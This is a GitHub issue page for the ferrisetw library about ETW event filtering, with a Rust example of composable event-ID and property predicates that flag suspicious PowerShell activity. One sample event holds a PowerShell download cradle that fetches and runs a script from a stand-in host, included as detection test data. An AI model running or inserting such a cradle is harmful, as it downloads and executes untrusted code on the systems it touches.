
Implement event filtering

Open n4r1b opened this issue 3 years ago • 1 comment

Info

ETW allows filters to be defined for a Provider in a session (MSDN - Defining Filters). KrabsETW already provides a mechanism to do filtering, either by events_id or by using more complicated predicates:

  • https://github.com/microsoft/krabsetw/tree/master/krabs/krabs/filtering

TODO

  • [ ] Research best way to introduce filters into Ferris
  • [x] Implement a basic filtering based on events_id
  • [ ] Research and implement a filtering based on more complex predicates

n4r1b avatar Jun 02 '21 22:06 n4r1b
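As an added example (not ferrisetw's or KrabsETW's code, and not the API the project eventually shipped), the block below models in plain Rust the two kinds of filter the issue mentions: a filter on event ID, and composable predicates over event properties in the style of KrabsETW's `filtering` module. The `Event` struct, the `Predicate` type, the combinators and the sample events are all constructed for illustration; the event IDs used (Microsoft-Windows-Kernel-Process 1 for process start, Microsoft-Windows-PowerShell 4104 for script block logging) are real, but the records are made up, not captured from a session. One caveat worth keeping in mind when designing this for a real library: ETW can apply an event-ID filter inside the session when the provider is enabled (EnableTraceEx2 with an EVENT_FILTER_TYPE_EVENT_ID descriptor), so rejected events are never delivered at all, whereas property predicates like the ones here can only run in the consumer callback after the event has been delivered and parsed.

```rust
use std::collections::HashMap;

/// Constructed stand-in for a parsed ETW event (not ferrisetw's record type).
#[derive(Debug, Clone, PartialEq)]
pub struct Event {
    pub provider: &'static str,
    pub event_id: u16,
    pub process_id: u32,
    pub properties: HashMap<&'static str, String>,
}

/// A filter is a boxed closure over an event, which is what lets
/// predicates be composed with `and` / `or` / `not` below.
pub type Predicate = Box<dyn Fn(&Event) -> bool>;

/// Event-ID filter. In a real session this is the one kind of filter the
/// kernel can enforce before delivery; the property predicates cannot be.
pub fn id_in(ids: Vec<u16>) -> Predicate {
    Box::new(move |e| ids.contains(&e.event_id))
}

pub fn pid_is(pid: u32) -> Predicate {
    Box::new(move |e| e.process_id == pid)
}

/// Exact match on a named property.
pub fn property_is(name: &'static str, value: &str) -> Predicate {
    let value = value.to_string();
    Box::new(move |e| e.properties.get(name) == Some(&value))
}

/// Case-insensitive substring match on a named property; events that lack
/// the property simply fail the predicate.
pub fn property_contains(name: &'static str, needle: &str) -> Predicate {
    let needle = needle.to_lowercase();
    Box::new(move |e| {
        e.properties
            .get(name)
            .map_or(false, |v| v.to_lowercase().contains(needle.as_str()))
    })
}

pub fn and(a: Predicate, b: Predicate) -> Predicate {
    Box::new(move |e| a(e) && b(e))
}

pub fn or(a: Predicate, b: Predicate) -> Predicate {
    Box::new(move |e| a(e) || b(e))
}

pub fn not(a: Predicate) -> Predicate {
    Box::new(move |e| !a(e))
}

/// Run a predicate over a batch of events, keeping the ones that pass.
pub fn filter_events<'a>(events: &'a [Event], pred: &Predicate) -> Vec<&'a Event> {
    events.iter().filter(|e| pred(*e)).collect()
}

fn ev(provider: &'static str, event_id: u16, process_id: u32,
      props: &[(&'static str, &str)]) -> Event {
    Event {
        provider,
        event_id,
        process_id,
        properties: props.iter().map(|(k, v)| (*k, v.to_string())).collect(),
    }
}

/// Constructed sample events (made up for this example, not a real capture).
pub fn sample_events() -> Vec<Event> {
    vec![
        ev("Microsoft-Windows-Kernel-Process", 1, 4120,
           &[("ImageName", r"\Device\HarddiskVolume3\Windows\System32\notepad.exe")]),
        ev("Microsoft-Windows-Kernel-Process", 1, 4188,
           &[("ImageName", r"\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe")]),
        ev("Microsoft-Windows-Kernel-Process", 2, 4120, &[]),
        ev("Microsoft-Windows-PowerShell", 4104, 4188,
           &[("ScriptBlockText", "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')")]),
        ev("Microsoft-Windows-PowerShell", 4104, 4188,
           &[("ScriptBlockText", "Get-ChildItem C:\\")]),
    ]
}

/// Composite filter: powershell.exe process starts, or script blocks that
/// contain a download cradle. Shows an ID filter and predicates combined.
pub fn suspicious_filter() -> Predicate {
    or(
        and(id_in(vec![1]), property_contains("ImageName", "powershell.exe")),
        and(id_in(vec![4104]), property_contains("ScriptBlockText", "downloadstring")),
    )
}

fn main() {
    let events = sample_events();
    for e in filter_events(&events, &suspicious_filter()) {
        println!("{} id={} pid={}", e.provider, e.event_id, e.process_id);
    }
}
```

The `id_in` step is the one that belongs on the session side in a real implementation; everything from `property_is` down is consumer-side work, so a library design that exposes both should make clear which filters reduce kernel-to-user traffic and which only hide events the consumer has already paid to receive.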

We're now able to filter by Event ID.

Predicates are left TODO.

daladim avatar Jan 13 '23 16:01 daladim